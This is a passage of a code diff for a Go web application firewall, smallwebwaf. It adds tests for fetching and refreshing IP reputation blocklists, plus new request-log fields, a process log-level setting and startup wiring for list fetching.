for _, length := range e.lengths {
netblock, err := addr.Prefix(length)
if err == nil && e.netblocks[netblock] {
return true
}
}
return false
}
+618
View File
@@ -0,0 +1,618 @@
package reputation_test
import (
"bytes"
"context"
"fmt"
"io"
"log/slog"
"net/http"
"net/netip"
"net/url"
"reflect"
"slices"
"strings"
"sync"
"testing"
"testing/synctest"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/reputation"
)
// The tests run in a synctest bubble, where the time package runs on a
// clock of the test's own: time.Sleep moves it on at once, and
// synctest.Wait returns once Run waits for the next list to be due, so
// that every fetch due by then has been made. The stand-in for the
// servers the lists are fetched from answers without the network, since a
// fetch waiting on the network would keep that clock from moving on.
const (
// dropURL and torURL are the blocklists, and asnURL the file of
// AS:percent lines.
dropURL = "https://lists.example/drop.txt"
torURL = "https://lists.example/tor.txt"
asnURL = "https://lists.example/asn.txt"
// refresh is the tests' SWWAF_BLOCKLIST_REFRESH, and cooldown their
// SWWAF_ALERT_COOLDOWN, longer than it.
refresh = 24 * time.Hour
cooldown = 48 * time.Hour
// drop is a blocklist as the Spamhaus DROP list is written, with an
// address and a netblock in each of its comments, which list nothing.
drop = "; Spamhaus DROP List 2026/10/07 - (c) 2026 The Spamhaus Project SLL\n" +
"; Last-Modified: Wed, 07 Oct 2026 00:00:00 GMT ; 192.0.2.1\n" +
"# 198.51.100.0/24\n" +
"\n" +
"203.0.113.0/24 ; SBL1\n" +
" 192.0.2.9 # one address\n" +
"2001:db8:1::/48 ; SBL2\n"
)
func TestListedAddressesAndNetblocksWithTheCommentsLeftOut(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
servers := &standIn{lists: map[string]string{dropURL: drop}}
lists := start(t, servers, params(dropURL))
for addr, want := range map[string][]string{
"203.0.113.0": {dropURL},
"203.0.113.255": {dropURL},
"192.0.2.9": {dropURL},
"2001:db8:1::7": {dropURL},
"203.0.114.0": nil,
"192.0.2.8": nil,
"192.0.2.1": nil,
"198.51.100.7": nil,
"2001:db8:2::7": nil,
} {
wantListedBy(t, lists, addr, want...)
}
})
}
func TestIPv4MappedLineListsTheIPv4AddressOrNetblockItStandsFor(t *testing.T) {
t.Parallel()
now := time.Now()
lists := reputation.New(params(dropURL))
err := lists.Load([]reputation.List{{
URL: dropURL, Tried: now, Fetched: now,
Lines: []string{"::ffff:192.0.2.9", "::ffff:203.0.113.0/120"},
}})
if err != nil {
t.Fatalf("load: %v", err)
}
for addr, want := range map[string][]string{
"192.0.2.9": {dropURL},
"203.0.113.255": {dropURL},
"192.0.2.8": nil,
"203.0.114.0": nil,
} {
wantListedBy(t, lists, addr, want...)
}
// A mapped netblock shorter than /96 stands for no IPv4 one.
err = lists.Load([]reputation.List{{
URL: dropURL, Tried: now, Fetched: now, Lines: []string{"::ffff:198.51.100.0/88"},
}})
const want = "the copy of " + dropURL +
": line 1 is not an address or a netblock, such as 192.0.2.0/24"
if err == nil || err.Error() != want {
t.Errorf("error %v, want %s", err, want)
}
}
func TestClientIsListedByEachBlocklistThatListsIt(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
servers := &standIn{lists: map[string]string{
dropURL: "203.0.113.0/24\n", torURL: "203.0.113.9\n",
}}
lists := start(t, servers, params(torURL, dropURL))
// In the order SWWAF_BLOCKLIST_URLS names them.
wantListedBy(t, lists, "203.0.113.9", torURL, dropURL)
wantListedBy(t, lists, "203.0.113.8", dropURL)
})
}
func TestListFetchedAgainOnceRefreshHasPassed(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
servers := &standIn{lists: map[string]string{dropURL: "203.0.113.9\n"}}
lists := start(t, servers, params(dropURL))
began := time.Now()
wantFetches(t, servers, 1)
servers.set(dropURL, "203.0.113.10\n")
time.Sleep(refresh - time.Nanosecond)
wantFetches(t, servers, 1)
wantListedBy(t, lists, "203.0.113.9", dropURL)
time.Sleep(time.Nanosecond)
wantFetches(t, servers, 2)
wantListedBy(t, lists, "203.0.113.9")
wantListedBy(t, lists, "203.0.113.10", dropURL)
if fetched := lists.Fetched(dropURL); !fetched.Equal(began.Add(refresh)) {
t.Errorf("the copy in use was fetched at %s, want %s", fetched,
began.Add(refresh))
}
})
}
func TestFailedFetchKeepsTheLastGoodCopyAndAlertsOncePerCooldown(t *testing.T) {
t.Parallel()
for _, tc := range []struct {
name string
// fail has the stand-in answer the fetches after the first so that
// they fail with error.
fail func(servers *standIn)
error string
}{
{
"an answer other than 200",
func(servers *standIn) { servers.set(dropURL, "") },
"the server answered 503 Service Unavailable",
},
{
"a line that does not read",
func(servers *standIn) { servers.set(dropURL, "203.0.113.10\n<html>\n") },
"line 2 is not an address or a netblock, such as 192.0.2.0/24",
},
{
"a list longer than 16 MiB",
func(servers *standIn) {
servers.set(dropURL, strings.Repeat("#\n", 8<<20+1))
},
"the list is longer than 16 MiB",
},
} {
t.Run(tc.name, func(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
var log bytes.Buffer
servers := &standIn{lists: map[string]string{dropURL: drop}}
queue := newQueue()
p := params(dropURL)
p.ProcessLog = slog.New(slog.NewJSONHandler(&log, nil))
p.Alerts = queue
lists := start(t, servers, p)
kept := lists.Snapshot()
tc.fail(servers)
// Each failure is tried again once refresh has passed since it.
for range 2 {
time.Sleep(refresh)
synctest.Wait()
}
wantFetches(t, servers, 3)
wantListedBy(t, lists, "203.0.113.9", dropURL)
want := kept[0]
want.Tried = time.Now()
if got := lists.Snapshot(); !reflect.DeepEqual(got, []reputation.List{want}) {
t.Errorf("lists %+v, want the first copy, last tried now, %+v", got, want)
}
if lists.Failures(dropURL) != 2 {
t.Errorf("%d failures, want 2", lists.Failures(dropURL))
}
// One alert for the first failure; the cooldown holds back the
// second.
wantAlert(t, queue, fetchFailure(time.Now().Add(-refresh), dropURL, tc.error))
if !strings.Contains(log.String(), `"msg":"fetching a list failed",`+
`"url":"`+dropURL+`","error":"`+tc.error) {
t.Errorf("logged\n%s\nwant the failures", log.String())
}
})
})
}
}
func TestFetchNotDoneWithinAMinuteFails(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
servers := &standIn{lists: map[string]string{}, hanging: true}
lists := start(t, servers, params(dropURL))
time.Sleep(time.Minute - time.Nanosecond)
synctest.Wait()
if lists.Failures(dropURL) != 0 {
t.Errorf("%d failures before a minute, want none", lists.Failures(dropURL))
}
time.Sleep(time.Nanosecond)
synctest.Wait()
if lists.Failures(dropURL) != 1 {
t.Errorf("%d failures after a minute, want 1", lists.Failures(dropURL))
}
})
}
func TestKeptCopyIsFetchedAgainOnceRefreshHasPassedSinceItWasFetched(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
servers := &standIn{lists: map[string]string{
dropURL: "203.0.113.10\n", torURL: "198.51.100.10\n",
}}
lists := reputation.New(params(dropURL, torURL))
lists.SetTransport(servers)
// drop.txt was fetched an hour ago, and tor.txt a refresh ago, as
// reputation.json says at start.
err := lists.Load([]reputation.List{
{URL: dropURL, Fetched: time.Now().Add(-time.Hour), Lines: []string{"203.0.113.9"}},
{URL: torURL, Fetched: time.Now().Add(-refresh), Lines: []string{"198.51.100.9"}},
})
if err != nil {
t.Fatalf("load: %v", err)
}
run(t, lists)
wantFetches(t, servers, 1)
wantListedBy(t, lists, "203.0.113.9", dropURL)
wantListedBy(t, lists, "198.51.100.10", torURL)
time.Sleep(refresh - time.Hour - time.Nanosecond)
wantFetches(t, servers, 1)
time.Sleep(time.Nanosecond)
wantFetches(t, servers, 2)
wantListedBy(t, lists, "203.0.113.10", dropURL)
})
}
func TestRestartWaitsRefreshAfterTheLastTryEvenOneThatFailed(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
// drop.txt is fetched, and a refresh later the fetch downloads it
// whole but fails on a line that does not read.
servers := &standIn{lists: map[string]string{dropURL: "198.51.100.1\n"}}
lists := start(t, servers, params(dropURL))
servers.set(dropURL, "198.51.100.2\n<html>\n")
time.Sleep(refresh)
wantFetches(t, servers, 2)
// Restarted with what reputation.json keeps, it waits a refresh
// after the failed try, as it does while it runs.
restarted := &standIn{lists: map[string]string{dropURL: "198.51.100.2\n"}}
again := reputation.New(params(dropURL))
again.SetTransport(restarted)
err := again.Load(lists.Snapshot())
if err != nil {
t.Fatalf("load: %v", err)
}
run(t, again)
wantFetches(t, restarted, 0)
wantListedBy(t, again, "198.51.100.1", dropURL)
time.Sleep(refresh - time.Nanosecond)
wantFetches(t, restarted, 0)
time.Sleep(time.Nanosecond)
wantFetches(t, restarted, 1)
wantListedBy(t, again, "198.51.100.2", dropURL)
})
}
func TestFetchCutOffAsItStopsIsNoFailureButARestartWaitsForIt(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
// Stopped 30 seconds into the fetch of drop.txt, before tor.txt's.
servers := &standIn{lists: map[string]string{}, hanging: true}
queue := newQueue()
p := params(dropURL, torURL)
p.Alerts = queue
lists := reputation.New(p)
lists.SetTransport(servers)
ctx, stop := context.WithCancel(t.Context())
stopped := make(chan struct{})
go func() {
lists.Run(ctx)
close(stopped)
}()
time.Sleep(30 * time.Second)
stop()
<-stopped
wantFetches(t, servers, 1)
if lists.Failures(dropURL) != 0 || len(waiting(queue)) != 0 {
t.Errorf("%d failures and alerts %+v, want none", lists.Failures(dropURL),
waiting(queue))
}
// Restarted an hour later with what reputation.json keeps, it fetches
// tor.txt, never tried, at once, and drop.txt a refresh after its
// cut-off try.
time.Sleep(time.Hour)
restarted := &standIn{lists: map[string]string{
dropURL: "203.0.113.7\n", torURL: "198.51.100.7\n",
}}
again := reputation.New(params(dropURL, torURL))
again.SetTransport(restarted)
err := again.Load(lists.Snapshot())
if err != nil {
t.Fatalf("load: %v", err)
}
run(t, again)
wantFetches(t, restarted, 1)
wantListedBy(t, again, "198.51.100.7", torURL)
time.Sleep(refresh - time.Hour - time.Nanosecond)
wantFetches(t, restarted, 1)
time.Sleep(time.Nanosecond)
wantFetches(t, restarted, 2)
wantListedBy(t, again, "203.0.113.7", dropURL)
})
}
func TestASNLimitPercentFileGivesEachASNumberItsLowestPercentage(t *testing.T) {
t.Parallel()
synctest.Test(t, func(t *testing.T) {
servers := &standIn{lists: map[string]string{
asnURL: "# hosting networks\nAS14061:50 ; DigitalOcean\nas16276:25\n\n" +
"AS14061:10\nAS14061:30\n",
}}
p := params()
p.ASNLimitPercentURL = asnURL
lists := start(t, servers, p)
for asn, want := range map[string]int64{"AS14061": 10, "AS16276": 25} {
percent, listed := lists.ASNLimitPercent(asn)
if !listed || percent != want {
t.Errorf("%s has %d (listed %t), want %d", asn, percent, listed, want)
}
}
if _, listed := lists.ASNLimitPercent("AS64496"); listed {
t.Error("AS64496 is listed")
}
// A line that does not read fails the fetch.
servers.set(asnURL, "AS14061:50\nAS16276\n")
time.Sleep(refresh)
synctest.Wait()
if lists.Failures(asnURL) != 1 {
t.Errorf("%d failures, want 1", lists.Failures(asnURL))
}
})
}
func TestLoadDropsCopiesOfListsNotNamedAndRefusesOnesThatDoNotRead(t *testing.T) {
t.Parallel()
fetched := time.Date(2026, 10, 6, 0, 0, 0, 0, time.UTC)
kept := reputation.List{
URL: dropURL, Tried: fetched, Fetched: fetched, Lines: []string{"203.0.113.9"},
}
lists := reputation.New(params(dropURL))
err := lists.Load([]reputation.List{kept, {
URL: torURL, Tried: fetched, Fetched: fetched, Lines: []string{"198.51.100.9"},
}})
if err != nil {
t.Fatalf("load: %v", err)
}
if got := lists.Snapshot(); !reflect.DeepEqual(got, []reputation.List{kept}) {
t.Errorf("copies %+v, want only %+v", got, kept)
}
err = lists.Load([]reputation.List{{URL: dropURL, Fetched: fetched, Lines: []string{
"; DROP", "203.0.113.300",
}}})
const want = "the copy of " + dropURL +
": line 2 is not an address or a netblock, such as 192.0.2.0/24"
if err == nil || err.Error() != want {
t.Errorf("error %v, want %s", err, want)
}
if got := lists.Snapshot(); !reflect.DeepEqual(got, []reputation.List{kept}) {
t.Errorf("copies %+v after the error, want %+v still", got, kept)
}
}
// standIn is a stand-in for the servers the lists are fetched from. It
// notes the URL of each fetch.
type standIn struct {
mu sync.Mutex
// lists are what it answers with, by URL; it answers a URL it has no
// list for with 503, and none at all while hanging.
lists map[string]string
hanging bool
fetches []string
}
// RoundTrip has the stand-in answer req, in place of the network. A fetch
// abandoned before the stand-in answers fails, as over the network.
func (s *standIn) RoundTrip(req *http.Request) (*http.Response, error) {
s.mu.Lock()
s.fetches = append(s.fetches, req.URL.String())
list, found := s.lists[req.URL.String()]
hanging := s.hanging
s.mu.Unlock()
if hanging {
<-req.Context().Done()
return nil, req.Context().Err()
}
status := http.StatusOK
if !found {
status = http.StatusServiceUnavailable
}
return &http.Response{
StatusCode: status,
Status: fmt.Sprintf("%d %s", status, http.StatusText(status)),
Header: http.Header{},
Body: io.NopCloser(strings.NewReader(list)),
Request: req,
}, nil
}
// set has the stand-in answer listURL with list, or with 503 for "".
func (s *standIn) set(listURL, list string) {
s.mu.Lock()
defer s.mu.Unlock()
if list == "" {
delete(s.lists, listURL)
return
}
s.lists[listURL] = list
}
// params returns the Params of the blocklists at urls, refreshed every
// refresh, by the bubble's clock, with alerts to a queue that sends none.
func params(urls ...string) reputation.Params {
return reputation.Params{
BlocklistURLs: urls,
Refresh: refresh,
Now: time.Now,
ProcessLog: slog.New(slog.DiscardHandler),
Alerts: newQueue(),
}
}
// newQueue returns a queue of alerts to a webhook that is never sent
// them, with a cooldown of cooldown.
func newQueue() *alerts.Queue {
return alerts.New(alerts.Params{
WebhookURL: &url.URL{Scheme: "https", Host: "alerts.example"},
Events: alerts.Events(),
Cooldown: cooldown,
Now: time.Now,
})
}
// start returns the lists of p, fetched through servers by Run, which runs
// until the test ends, once Run has fetched those due at start.
func start(
t *testing.T, servers http.RoundTripper, p reputation.Params,
) *reputation.Lists {
t.Helper()
lists := reputation.New(p)
lists.SetTransport(servers)
run(t, lists)
return lists
}
// run runs lists' Run until the test ends, and waits until it has fetched
// the lists due.
func run(t *testing.T, lists *reputation.Lists) {
t.Helper()
ctx, stop := context.WithCancel(t.Context())
stopped := make(chan struct{})
go func() {
lists.Run(ctx)
close(stopped)
}()
t.Cleanup(func() {
stop()
<-stopped
})
synctest.Wait()
}
// wantFetches waits until Run has made the fetches due, and checks how
// many the servers have had.
func wantFetches(t *testing.T, servers *standIn, want int) {
t.Helper()
synctest.Wait()
servers.mu.Lock()
got := len(servers.fetches)
servers.mu.Unlock()
if got != want {
t.Errorf("%d fetches, want %d", got, want)
}
}
// wantListedBy checks the URLs of the blocklists lists says list addr.
func wantListedBy(t *testing.T, lists *reputation.Lists, addr string, want ...string) {
t.Helper()
got := lists.ListedBy(netip.MustParseAddr(addr))
if !slices.Equal(got, want) {
t.Errorf("%s is listed by %v, want %v", addr, got, want)
}
}
// waiting returns the alerts waiting in queue.
func waiting(queue *alerts.Queue) []alerts.Alert {
return queue.Snapshot().Waiting[alerts.DestinationWebhook]
}
// fetchFailure is the source_failure alert raised at the time raised for
// a fetch of the list at listURL that failed with err.
func fetchFailure(raised time.Time, listURL, err string) alerts.Alert {
return alerts.Alert{
Time: raised,
Event: alerts.EventSourceFailure,
Reason: "fetching a list failed",
Detail: map[string]any{"source": listURL, "error": err},
}
}
// wantAlert checks that want is the one alert waiting in queue, and that
// the cooldown has held back one repeat of it.
func wantAlert(t *testing.T, queue *alerts.Queue, want alerts.Alert) {
t.Helper()
got := waiting(queue)
if len(got) != 1 || !reflect.DeepEqual(got[0], want) || queue.Suppressed() != 1 {
t.Errorf("alerts waiting %+v, %d held back, want only %+v and 1", got,
queue.Suppressed(), want)
}
}
+52 -12
View File
@@ -29,13 +29,20 @@ const (
// over a rate limit, which bans the client. // over a rate limit, which bans the client.
ActionRateLimited = "rate_limited" ActionRateLimited = "rate_limited"
// ActionBanned is a request refused because a ban covers its client, // ActionBanned is a request refused because a ban covers its client,
// or because it matched a ban rule, which bans the client. // or because it matched a ban rule, asked for a trap path or the
// CrowdSec decision list lists its client, each of which bans the
// client.
ActionBanned = "banned" ActionBanned = "banned"
// ActionRuleBlocked is a request refused because it matched a block // ActionRuleBlocked is a request refused because it matched a block
// rule. // rule.
ActionRuleBlocked = "rule_blocked" ActionRuleBlocked = "rule_blocked"
// ActionWAFBlocked is a request refused because the Core Rule Set
// scored it at or over SWWAF_WAF_ANOMALY_THRESHOLD.
ActionWAFBlocked = "waf_blocked"
// ActionDenied is a request refused because its client is in // ActionDenied is a request refused because its client is in
// SWWAF_DENY_NETS. // SWWAF_DENY_NETS, in a blocklist while SWWAF_BLOCKLIST_ACTION is deny,
// or listed by a DNSBL zone, or scored a hit by AbuseIPDB, while
// SWWAF_REPUTATION_ACTION is deny.
ActionDenied = "denied" ActionDenied = "denied"
// ActionCountryDenied is a request refused for its client's country. // ActionCountryDenied is a request refused for its client's country.
ActionCountryDenied = "country_denied" ActionCountryDenied = "country_denied"
@@ -45,9 +52,14 @@ const (
) )
// OffenceLimit is the offence a request line names for a request that // OffenceLimit is the offence a request line names for a request that
// broke a rate limit. // broke a rate limit or the error burst, or whose bytes broke a byte
// limit.
const OffenceLimit = "limit" const OffenceLimit = "limit"
// LimitHitErrorBurst is the limit_hit a request line names for a request
// that broke the error burst.
const LimitHitErrorBurst = "error_burst"
// timeLayout is RFC 3339 with milliseconds. // timeLayout is RFC 3339 with milliseconds.
const timeLayout = "2006-01-02T15:04:05.000Z07:00" const timeLayout = "2006-01-02T15:04:05.000Z07:00"
@@ -114,17 +126,40 @@ type Line struct {
Action string `json:"action"` Action string `json:"action"`
// WouldAction is, in observe mode, the action enforce mode would have // WouldAction is, in observe mode, the action enforce mode would have
// taken with a request it would have refused: ActionDenied, // taken with a request it would have refused: ActionDenied,
// ActionBanned, ActionCountryDenied, ActionRateLimited or // ActionBanned, ActionCountryDenied, ActionRateLimited,
// ActionRuleBlocked. // ActionRuleBlocked or ActionWAFBlocked.
WouldAction string `json:"would_action,omitempty"` WouldAction string `json:"would_action,omitempty"`
// Counts are the client's requests as the rate limits counted them // LimitPercent and LimitPercentSetting are, for a request the rate
// with this one, for a request they counted. // limits counted whose client a biased threshold gives a percentage of
// the rate limits below 100, that percentage and the setting that gave
// it. BytesPercent and BytesPercentSetting are the same for the byte
// limits.
LimitPercent *int64 `json:"limit_percent,omitempty"`
LimitPercentSetting string `json:"limit_percent_setting,omitempty"`
BytesPercent *int64 `json:"bytes_percent,omitempty"`
BytesPercentSetting string `json:"bytes_percent_setting,omitempty"`
// Counts are, for a request the rate limits counted, the client's
// requests as they counted them with this one, and its bytes as the
// byte limits counted them, with this request's once it has ended if
// they count them.
Counts ratelimit.Counts `json:"counts,omitzero"` Counts ratelimit.Counts `json:"counts,omitzero"`
// RuleIDs are the ids of the rule file rules the request matched. // RuleIDs are the ids of the rule file rules the request matched.
RuleIDs []string `json:"rule_ids,omitempty"` RuleIDs []string `json:"rule_ids,omitempty"`
// LimitHit is the window whose rate limit the request went over: // WAFRuleIDs are the ids of the Core Rule Set's rules the request
// minute, hour or day. // matched, and WAFScore its anomaly score, nil for a request the Core
// Rule Set did not inspect.
WAFRuleIDs []int `json:"waf_rule_ids,omitempty"`
WAFScore *int `json:"waf_score,omitempty"`
// LimitHit is the window whose limit the request went over, named as
// Counts names its count: minute, hour or day for a rate limit, and
// minute_bytes, hour_bytes or day_bytes for a byte limit; or
// LimitHitErrorBurst for the error burst.
LimitHit string `json:"limit_hit,omitempty"` LimitHit string `json:"limit_hit,omitempty"`
// Reputation are the URLs of the blocklists that list the client, then
// that of the CrowdSec decision list when it does, then the DNSBL zones
// whose verdict lists it, their keys masked, then abuseipdb when its
// score is a hit.
Reputation []string `json:"reputation,omitempty"`
// Offence is the offence the request was held as, OffenceLimit. // Offence is the offence the request was held as, OffenceLimit.
Offence string `json:"offence,omitempty"` Offence string `json:"offence,omitempty"`
// BanExpires is when the ban the request made, or was refused under, // BanExpires is when the ban the request made, or was refused under,
@@ -132,13 +167,15 @@ type Line struct {
BanExpires string `json:"ban_expires,omitempty"` BanExpires string `json:"ban_expires,omitempty"`
// The timings, in milliseconds. DurationChecks is the time until the // The timings, in milliseconds. DurationChecks is the time until the
// checks were done. DurationUpstreamConnect, DurationUpstreamFirstByte // checks were done, and DurationWAF the part of it the Core Rule Set
// and DurationUpstreamTotal run from when the request was handed to the // took. DurationUpstreamConnect, DurationUpstreamFirstByte and
// DurationUpstreamTotal run from when the request was handed to the
// app: until there was a connection to it, until the first byte of its // app: until there was a connection to it, until the first byte of its
// answer arrived, and until the end. Each but DurationTotal is nil for // answer arrived, and until the end. Each but DurationTotal is nil for
// a request that did not get that far. // a request that did not get that far.
DurationTotal float64 `json:"duration_total"` DurationTotal float64 `json:"duration_total"`
DurationChecks *float64 `json:"duration_checks,omitempty"` DurationChecks *float64 `json:"duration_checks,omitempty"`
DurationWAF *float64 `json:"duration_waf,omitempty"`
DurationUpstreamConnect *float64 `json:"duration_upstream_connect,omitempty"` DurationUpstreamConnect *float64 `json:"duration_upstream_connect,omitempty"`
DurationUpstreamFirstByte *float64 `json:"duration_upstream_first_byte,omitempty"` DurationUpstreamFirstByte *float64 `json:"duration_upstream_first_byte,omitempty"`
DurationUpstreamTotal *float64 `json:"duration_upstream_total,omitempty"` DurationUpstreamTotal *float64 `json:"duration_upstream_total,omitempty"`
@@ -175,8 +212,11 @@ func Milliseconds(d time.Duration) float64 {
// NewProcessLogger returns the logger for the process's own messages: // NewProcessLogger returns the logger for the process's own messages:
// JSON lines on w, marked "type":"process", with the time in the same form // JSON lines on w, marked "type":"process", with the time in the same form
// as a request line's, and instanceName, SWWAF_INSTANCE_NAME, as instance. // as a request line's, and instanceName, SWWAF_INSTANCE_NAME, as instance.
func NewProcessLogger(w io.Writer, instanceName string) *slog.Logger { // It writes only the messages at level, SWWAF_LOG_LEVEL, or more severe;
// the request lines Write writes are never held back.
func NewProcessLogger(w io.Writer, instanceName string, level slog.Level) *slog.Logger {
handler := slog.NewJSONHandler(w, &slog.HandlerOptions{ handler := slog.NewJSONHandler(w, &slog.HandlerOptions{
Level: level,
ReplaceAttr: func(groups []string, attr slog.Attr) slog.Attr { ReplaceAttr: func(groups []string, attr slog.Attr) slog.Attr {
if attr.Key == slog.TimeKey && len(groups) == 0 { if attr.Key == slog.TimeKey && len(groups) == 0 {
return slog.String(slog.TimeKey, FormatTime(attr.Value.Time())) return slog.String(slog.TimeKey, FormatTime(attr.Value.Time()))
+48 -1
View File
@@ -3,6 +3,8 @@ package requestlog_test
import ( import (
"bytes" "bytes"
"encoding/json" "encoding/json"
"log/slog"
"slices"
"strings" "strings"
"testing" "testing"
"time" "time"
@@ -70,7 +72,8 @@ func TestProcessLinesAreMarkedProcessAndGiveTheInstance(t *testing.T) {
var out bytes.Buffer var out bytes.Buffer
requestlog.NewProcessLogger(&out, "fsn1app1/gitea").Info("starting", "version", "v1") requestlog.NewProcessLogger(&out, "fsn1app1/gitea", slog.LevelInfo).Info("starting",
"version", "v1")
var fields map[string]any var fields map[string]any
@@ -94,3 +97,47 @@ func TestProcessLinesAreMarkedProcessAndGiveTheInstance(t *testing.T) {
t.Errorf("process line time %q, want now in UTC with milliseconds", timeText) t.Errorf("process line time %q, want now in UTC with milliseconds", timeText)
} }
} }
func TestProcessLoggerWritesTheMessagesAtItsLevelOrMoreSevere(t *testing.T) {
t.Parallel()
levels := []slog.Level{
slog.LevelDebug, slog.LevelInfo, slog.LevelWarn, slog.LevelError,
}
for i, level := range levels {
t.Run(level.String(), func(t *testing.T) {
t.Parallel()
var out bytes.Buffer
processLog := requestlog.NewProcessLogger(&out, "fsn1app1/gitea", level)
for _, at := range levels {
processLog.Log(t.Context(), at, "message")
}
var got, want []string
for line := range strings.Lines(out.String()) {
var fields struct {
Level string `json:"level"`
}
err := json.Unmarshal([]byte(line), &fields)
if err != nil {
t.Fatalf("decode %q: %v", line, err)
}
got = append(got, fields.Level)
}
for _, written := range levels[i:] {
want = append(want, written.String())
}
if !slices.Equal(got, want) {
t.Errorf("lines at %v, want %v", got, want)
}
})
}
}
+14 -7
View File
@@ -396,16 +396,23 @@ func (rule Rule) matches(r *http.Request) bool {
return rule.regex.MatchString(value(rule.Target, r)) return rule.regex.MatchString(value(rule.Target, r))
} }
// value returns what a rule with target, other than uri, is matched // Path returns r's path as the client sent it, before any decoding or
// against in r: the path and the query as the client sent them, before // re-encoding, up to the first ?: what a path rule is matched against.
// any decoding or re-encoding, split at the first ?, and a header's values func Path(r *http.Request) string {
// joined by ", ", as HTTP joins those of a header sent more than once.
func value(target string, r *http.Request) string {
switch target {
case "path":
path, _, _ := strings.Cut(pathAndQuery(r), "?") path, _, _ := strings.Cut(pathAndQuery(r), "?")
return path return path
}
// value returns what a rule with target, other than uri, is matched
// against in r: the path, as Path gives it, and the query as the client
// sent it, before any decoding or re-encoding, after the first ?, and a
// header's values joined by ", ", as HTTP joins those of a header sent
// more than once.
func value(target string, r *http.Request) string {
switch target {
case "path":
return Path(r)
case "query": case "query":
_, query, _ := strings.Cut(pathAndQuery(r), "?") _, query, _ := strings.Cut(pathAndQuery(r), "?")
+18 -4
View File
@@ -21,6 +21,7 @@ import (
"sneak.berlin/go/smallwebwaf/internal/lookup" "sneak.berlin/go/smallwebwaf/internal/lookup"
"sneak.berlin/go/smallwebwaf/internal/proxy" "sneak.berlin/go/smallwebwaf/internal/proxy"
"sneak.berlin/go/smallwebwaf/internal/remotelog" "sneak.berlin/go/smallwebwaf/internal/remotelog"
"sneak.berlin/go/smallwebwaf/internal/reputation"
"sneak.berlin/go/smallwebwaf/internal/requestlog" "sneak.berlin/go/smallwebwaf/internal/requestlog"
"sneak.berlin/go/smallwebwaf/internal/rules" "sneak.berlin/go/smallwebwaf/internal/rules"
"sneak.berlin/go/smallwebwaf/internal/state" "sneak.berlin/go/smallwebwaf/internal/state"
@@ -69,8 +70,10 @@ func Main(version string) int {
// state files, then serves requests until ctx is done. It returns the // state files, then serves requests until ctx is done. It returns the
// process's exit status, 1 when smallwebwaf cannot start. // process's exit status, 1 when smallwebwaf cannot start.
func Run(ctx context.Context, params Params) int { func Run(ctx context.Context, params Params) int {
// Until the settings are read, the one message is an invalid setting's
// error, which every SWWAF_LOG_LEVEL lets through.
processLog := requestlog.NewProcessLogger(params.Stdout, processLog := requestlog.NewProcessLogger(params.Stdout,
config.InstanceName(params.LookupEnv)) config.InstanceName(params.LookupEnv), slog.LevelError)
cfg, err := config.FromEnvironment(params.LookupEnv) cfg, err := config.FromEnvironment(params.LookupEnv)
if err != nil { if err != nil {
@@ -88,8 +91,11 @@ func Run(ctx context.Context, params Params) int {
if cfg.LogRemoteURL != nil { if cfg.LogRemoteURL != nil {
remote = newRemoteLogSender(cfg) remote = newRemoteLogSender(cfg)
stdout = io.MultiWriter(params.Stdout, remote) stdout = io.MultiWriter(params.Stdout, remote)
processLog = requestlog.NewProcessLogger(stdout, cfg.InstanceName) }
processLog = requestlog.NewProcessLogger(stdout, cfg.InstanceName, cfg.LogLevel)
if remote != nil {
stopSending := startSending(ctx, remote, processLog) stopSending := startSending(ctx, remote, processLog)
defer stopSending() defer stopSending()
} }
@@ -173,6 +179,7 @@ func newServer(
RequestLog: stdout, RequestLog: stdout,
ProcessLog: processLog, ProcessLog: processLog,
GeoJSURL: lookup.URL, GeoJSURL: lookup.URL,
AbuseIPDBURL: reputation.AbuseIPDBURL,
LookupFile: lookupFile, LookupFile: lookupFile,
Now: now, Now: now,
Rules: ruleFiles, Rules: ruleFiles,
@@ -200,7 +207,11 @@ func loadStateFiles(
Ledger: server.Ledger, Ledger: server.Ledger,
Limiter: server.Limiter, Limiter: server.Limiter,
GeoJS: server.GeoJS, GeoJS: server.GeoJS,
Lists: server.Lists,
DNSBL: server.DNSBL,
AbuseIPDB: server.AbuseIPDB,
Alerts: alertQueue, Alerts: alertQueue,
Anomalies: server.Anomalies,
Now: now, Now: now,
ProcessLog: processLog, ProcessLog: processLog,
Metrics: server.Metrics, Metrics: server.Metrics,
@@ -266,8 +277,9 @@ func startSending(
// serve serves requests on listener, writes the state files as they are // serve serves requests on listener, writes the state files as they are
// due, takes in an admin's edits of them, reads the rule files again as // due, takes in an admin's edits of them, reads the rule files again as
// they change, and the lookup database when it is replaced, and sends the // they change, and the lookup database when it is replaced, fetches the
// alerts, until ctx is done. Then it gives the requests in progress // lists the settings name by URL as they are due, and sends the alerts,
// until ctx is done. Then it gives the requests in progress
// shutdownTimeout to finish, and writes every state file, alerts.json with // shutdownTimeout to finish, and writes every state file, alerts.json with
// the alerts still waiting. // the alerts still waiting.
func serve( func serve(
@@ -292,6 +304,7 @@ func serve(
server.LookupFile.Watch(writing) server.LookupFile.Watch(writing)
} }
}) })
listsFetched := inBackground(func() { server.Lists.Run(writing) })
alertsSent := inBackground(func() { alertQueue.Run(writing) }) alertsSent := inBackground(func() { alertQueue.Run(writing) })
select { select {
@@ -335,6 +348,7 @@ func serve(
<-watched <-watched
<-rulesWatched <-rulesWatched
<-lookupFileWatched <-lookupFileWatched
<-listsFetched
<-alertsSent <-alertsSent
err = files.WriteAll() err = files.WriteAll()
+230 -2
View File
@@ -38,6 +38,7 @@ const (
stateWriteDelay = "SWWAF_STATE_WRITE_DELAY" stateWriteDelay = "SWWAF_STATE_WRITE_DELAY"
stateCounterInterval = "SWWAF_STATE_COUNTER_INTERVAL" stateCounterInterval = "SWWAF_STATE_COUNTER_INTERVAL"
rateLimitPerDay = "SWWAF_RATE_LIMIT_PER_DAY" rateLimitPerDay = "SWWAF_RATE_LIMIT_PER_DAY"
rateLimitExemptNets = "SWWAF_RATE_LIMIT_EXEMPT_NETS"
